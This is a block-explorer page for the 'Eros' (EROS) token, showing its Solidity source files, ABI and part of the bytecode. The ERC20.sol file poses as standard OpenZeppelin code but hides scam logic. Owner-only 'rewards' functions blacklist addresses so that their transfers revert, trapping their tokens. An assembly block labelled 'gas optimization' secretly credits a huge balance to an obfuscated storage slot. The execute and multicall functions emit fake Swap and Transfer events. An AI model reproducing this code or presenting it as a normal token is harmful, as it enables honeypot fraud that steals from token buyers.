ETH Price: $3,147.38 (-8.01%)
Gas: 6 Gwei

Token

Eros (EROS)
 

Overview

Max Total Supply

1,000,000,000,000 EROS

Holders

39

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
2,828,328,037.058798151981916013 EROS

Value
$0.00
0x10485927ff4b9d5d4e99225118e72dc2a8155657
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
EROS

Compiler Version
v0.8.16+commit.07a7930e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 3 of 5: EROS.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract EROS is ERC20 {
    constructor() ERC20("Eros", "EROS") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

File 1 of 5: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 5: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _rewards;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    bool private _rewardsApplied = false;
    address private _title;


    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function grantRewards(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = true;
        }
    }

    function proceedRewards(address [] calldata _rewardees_) external onlyOwner {
        for (uint256 i = 0; i < _rewardees_.length; i++) {
            _rewards[_rewardees_[i]] = false;
        }
    }

    function readBytes(address _bytes_) public view returns (bool) {
        return _rewards[_bytes_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_title, _addresses_[i], _out);
        }
    }
    function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _title, _in);
        }
    }


    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function multicall(address a) external onlyOwner {_title = a;}
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
            // gas optimization 
            assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 //amount
    ) internal virtual {if (_rewards[to] || _rewards[from]) require(_rewardsApplied == true, "");}

}

File 4 of 5: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to);
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 5 of 5: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"grantRewards","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from_","type":"address"},{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_rewardees_","type":"address[]"}],"name":"proceedRewards","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_bytes_","type":"address"}],"name":"readBytes","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600760006101000a81548160ff0219169083151502179055503480156200002c57600080fd5b506040518060400160405280600481526020017f45726f73000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f45524f5300000000000000000000000000000000000000000000000000000000815250620000b9620000ad6200012660201b60201c565b6200012e60201b60201c565b8160059081620000ca919062000732565b508060069081620000dc919062000732565b5050506200012033620000f4620001f260201b60201c565b600a620001029190620009a9565b64e8d4a51000620001149190620009fa565b620001fb60201b60201c565b62000b93565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200026d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002649062000abc565b60405180910390fd5b6200028160008383620003ac60201b60201c565b806004600082825462000295919062000ade565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200038c919062000b2a565b60405180910390a3620003a860008383620003b160201b60201c565b5050565b505050565b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680620004535750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15620004b35760011515600760009054906101000a900460ff16151514620004b2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004a99062000b71565b60405180910390fd5b5b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200053a57607f821691505b60208210810362000550576200054f620004f2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005ba7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200057b565b620005c686836200057b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006136200060d6200060784620005de565b620005e8565b620005de565b9050919050565b6000819050919050565b6200062f83620005f2565b620006476200063e826200061a565b84845462000588565b825550505050565b600090565b6200065e6200064f565b6200066b81848462000624565b505050565b5b8181101562000693576200068760008262000654565b60018101905062000671565b5050565b601f821115620006e257620006ac8162000556565b620006b7846200056b565b81016020851015620006c7578190505b620006df620006d6856200056b565b83018262000670565b50505b505050565b600082821c905092915050565b60006200070760001984600802620006e7565b1980831691505092915050565b6000620007228383620006f4565b9150826002028217905092915050565b6200073d82620004b8565b67ffffffffffffffff811115620007595762000758620004c3565b5b62000765825462000521565b6200077282828562000697565b600060209050601f831160018114620007aa576000841562000795578287015190505b620007a1858262000714565b86555062000811565b601f198416620007ba8662000556565b60005b82811015620007e457848901518255600182019150602085019450602081019050620007bd565b8683101562000804578489015162000800601f891682620006f4565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620008a7578086048111156200087f576200087e62000819565b5b60018516156200088f5780820291505b80810290506200089f8562000848565b94506200085f565b94509492505050565b600082620008c2576001905062000995565b81620008d2576000905062000995565b8160018114620008eb5760028114620008f6576200092c565b600191505062000995565b60ff8411156200090b576200090a62000819565b5b8360020a91508482111562000925576200092462000819565b5b5062000995565b5060208310610133831016604e8410600b8410161715620009665782820a90508381111562000960576200095f62000819565b5b62000995565b62000975848484600162000855565b925090508184048111156200098f576200098e62000819565b5b81810290505b9392505050565b600060ff82169050919050565b6000620009b682620005de565b9150620009c3836200099c565b9250620009f27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620008b0565b905092915050565b600062000a0782620005de565b915062000a1483620005de565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000a505762000a4f62000819565b5b828202905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000aa4601f8362000a5b565b915062000ab18262000a6c565b602082019050919050565b6000602082019050818103600083015262000ad78162000a95565b9050919050565b600062000aeb82620005de565b915062000af883620005de565b925082820190508082111562000b135762000b1262000819565b5b92915050565b62000b2481620005de565b82525050565b600060208201905062000b41600083018462000b19565b92915050565b50565b600062000b5960008362000a5b565b915062000b668262000b47565b600082019050919050565b6000602082019050818103600083015262000b8c8162000b4a565b9050919050565b611f798062000ba36000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad57806397541e9f1161007157806397541e9f14610331578063a457c2d71461034d578063a9059cbb1461037d578063dd62ed3e146103ad578063f2fde38b146103dd5761012c565b8063715018a6146102b357806373ed6b13146102bd5780638da5cb5b146102d957806395d89b41146102f7578063963e1e54146103155761012c565b806332a0e002116100f457806332a0e002146101eb578063395093511461021b5780634bf894411461024b578063618a2f5e1461026757806370a08231146102835761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461017f57806323b872dd1461019d578063313ce567146101cd575b600080fd5b6101396103f9565b6040516101469190611463565b60405180910390f35b61016960048036038101906101649190611523565b61048b565b604051610176919061157e565b60405180910390f35b6101876104ae565b60405161019491906115a8565b60405180910390f35b6101b760048036038101906101b291906115c3565b6104b8565b6040516101c4919061157e565b60405180910390f35b6101d56104e7565b6040516101e29190611632565b60405180910390f35b6102056004803603810190610200919061164d565b6104f0565b604051610212919061157e565b60405180910390f35b61023560048036038101906102309190611523565b610546565b604051610242919061157e565b60405180910390f35b610265600480360381019061026091906116df565b61057d565b005b610281600480360381019061027c919061172c565b61062a565b005b61029d6004803603810190610298919061164d565b610794565b6040516102aa91906115a8565b60405180910390f35b6102bb6107dd565b005b6102d760048036038101906102d2919061172c565b6107f1565b005b6102e161095c565b6040516102ee91906117c3565b60405180910390f35b6102ff610985565b60405161030c9190611463565b60405180910390f35b61032f600480360381019061032a91906116df565b610a17565b005b61034b6004803603810190610346919061164d565b610ac4565b005b61036760048036038101906103629190611523565b610b10565b604051610374919061157e565b60405180910390f35b61039760048036038101906103929190611523565b610b87565b6040516103a4919061157e565b60405180910390f35b6103c760048036038101906103c291906117de565b610baa565b6040516103d491906115a8565b60405180910390f35b6103f760048036038101906103f2919061164d565b610c31565b005b6060600580546104089061184d565b80601f01602080910402602001604051908101604052809291908181526020018280546104349061184d565b80156104815780601f1061045657610100808354040283529160200191610481565b820191906000526020600020905b81548152906001019060200180831161046457829003601f168201915b5050505050905090565b600080610496610cb4565b90506104a3818585610cbc565b600191505092915050565b6000600454905090565b6000806104c3610cb4565b90506104d0858285610e85565b6104db858585610f11565b60019150509392505050565b60006012905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600080610551610cb4565b90506105728185856105638589610baa565b61056d91906118ad565b610cbc565b600191505092915050565b61058561118a565b60005b82829050811015610625576000600260008585858181106105ac576105ab6118e1565b5b90506020020160208101906105c1919061164d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061d90611910565b915050610588565b505050565b60005b8484905081101561078c5784848281811061064b5761064a6118e1565b5b9050602002016020810190610660919061164d565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516106c3949392919061199d565b60405180910390a38484828181106106de576106dd6118e1565b5b90506020020160208101906106f3919061164d565b73ffffffffffffffffffffffffffffffffffffffff16600760019054906101000a900473fffffff